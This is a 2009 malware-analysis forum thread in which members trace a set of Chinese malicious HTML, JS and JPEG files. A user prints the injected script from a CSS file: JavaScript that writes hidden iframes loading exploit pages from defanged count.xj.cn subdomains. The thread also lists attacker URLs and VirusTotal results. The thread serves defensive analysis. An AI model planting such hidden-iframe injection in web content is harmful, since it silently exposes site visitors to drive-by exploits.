Malware Domain List

Malware Related => Malware Analysis => Topic started by: kakarot on December 15, 2009, 09:29:28 am

Title: Plz Decode 3 Malicious HTML File From CHINA
Post by: kakarot on December 15, 2009, 09:29:28 am
Hi Hello

I Don't Decode this htm file :'(

It's pack From China

ps.I know mepeg and dj.jpg it's a mepeg exploit

thx

/EDITed by SysAdMini

zipped files, password "infected"
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: SysAdMini on December 15, 2009, 10:47:07 am
dj.jpg : url  in shellcode hxxp://c1s.count.xj.cn/images/images/js.js
http://www.virustotal.com/analisis/f300a3c2a96ffd163b6802e274f3211f2c4ac2cf9fe9864d10c1ba4d38199e0f-1260873959

mepeg.htm : loads dj.jpg and dj1.jpg

of.htm: loads of.js that isn't included in your collection

ff.htm : loads go.js that isn't included in your collection

bf.htm : requires sfbf.css that isn't included in your collection
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: MysteryFCM on December 15, 2009, 02:25:20 pm
@kakarot,
Can I ask you also post the URL you get these from in future, so we can get any missing files ourselves?
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: kakarot on December 15, 2009, 02:56:19 pm
sorry My Mistake and Thx

It's a Start 1.css

Code: [Select]
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://ican.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://not.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=hxxp://stop.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=hxxp://loveing.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=hxxp://you.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}

Code: [Select]
hxxp://not.count.xj.cn/images/images/tj.htmIt's have
Code: [Select]
<script language="javascript" src="http://count45.51yes.com/click.aspx?id=457288414&logo=11" charset="gb2312"></script>http://count45.51yes.com  <<--- China Web Count Serverice

hxxp://you.count.xj.cn/images/images/sfbf.css
sfbf.css <-- Virus Total - Result: 0/41 (0.00%)Result: 0/41 (0.00%) ???
http://www.virustotal.com/analisis/34ecc90fe1af2c6150d1ca8aaec72ff83edf3e0720c01101d4a86691387d175f-1257176016

hxxp://stop.count.xj.cn/images/images/go.js
go.js <-- Virus Total -- Result: 2/41 (4.88%) AVAST : JS:ShellCode-AO ???
http://www.virustotal.com/analisis/3dd5dd4cb27ff9b5ee947da4db77d28aae01f09b127c3452d78095131897d8fc-1260886730

hxxp://loveing.count.xj.cn/images/images/of.js
of.js <-- VirusTotal -- Not Finished
http://www.virustotal.com/analisis/74cc1bf196c40a45185c84ec662545ed9ec99714ca0447910be638511bb4e11d-1260886751

 of.js , go.js , sfbf.css Inside Zip File

thx ;D

MysteryFCM: Changed quote tags to code tags
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: binary on December 23, 2009, 01:56:43 pm
SysAdMini,

I tried to decode those shell code that was in the dj.jpg file... I believe they were preceded with '|'? I converted em to HEX and analyzed with strings, but didn't find an URL... can you reference how did to find one  :-X